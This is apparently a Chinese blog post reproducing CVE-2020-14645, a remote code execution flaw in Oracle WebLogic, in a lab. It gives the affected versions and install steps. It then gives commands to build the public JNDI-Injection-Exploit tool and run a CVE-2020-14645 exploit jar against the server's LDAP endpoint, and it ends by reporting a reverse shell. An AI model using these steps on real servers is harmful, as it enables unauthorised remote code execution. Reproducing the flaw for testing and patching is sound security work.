本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
正文共: 1453字 17图
预计阅读时间:4分钟
简介
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
攻击者可利用漏洞实现远程代码执行。
影响版本
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
复现环境
下载JDK 6u211/7u201/8u191任意版本并配置环境变量
本人用的jdk8(下载地址:
https://mega.nz/file/1KIhjSCR#g0s5jekk3F9t55o3WXK_ahozuqn9_60eKSKt70we_uw)
WebLogic 12.2.1.4官方下载地址:
https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
安装
一直点下一步,勾选自助启动配置向导选项
进入配置向导,创建新域并勾选全部模板
安装成功后,使用cd跳到base_domain目录下
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
运行startWebLogic.cmd
浏览器访问http://IP:7001/console/login/LoginForm.jsp
使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件
JNDI工具下载地址:
https://github.com/welk1n/JNDI-Injection-Exploit
下载完成后进入目录编译
cd JNDI-Injection-Exploit
mvn clean package -DskipTests
编译的时间比较久,需要多等会(我在进行编译的时候,花了很久时间,是Maven源没更换导致的)
编译完成后进入target,使用命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]
然后使用CVE-2020-14645漏洞验证工具
下载地址:https://github.com/DSO-Lab/defvul(推荐使用镜像地址:https://github.com.cnpmjs.org/DSO-Lab/defvul)
进入CVE-2020-14645_Weblogic目录下进行编译
因为我kali中的jdk版本为11,该漏洞验证工具需要的jdk版本为1.8;于是我又屁颠屁颠在ubuntu上装java,装mvn;开始编译
编译成功:
然后进入target
java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit
成功反弹
END
扫描二维码
获取更多精彩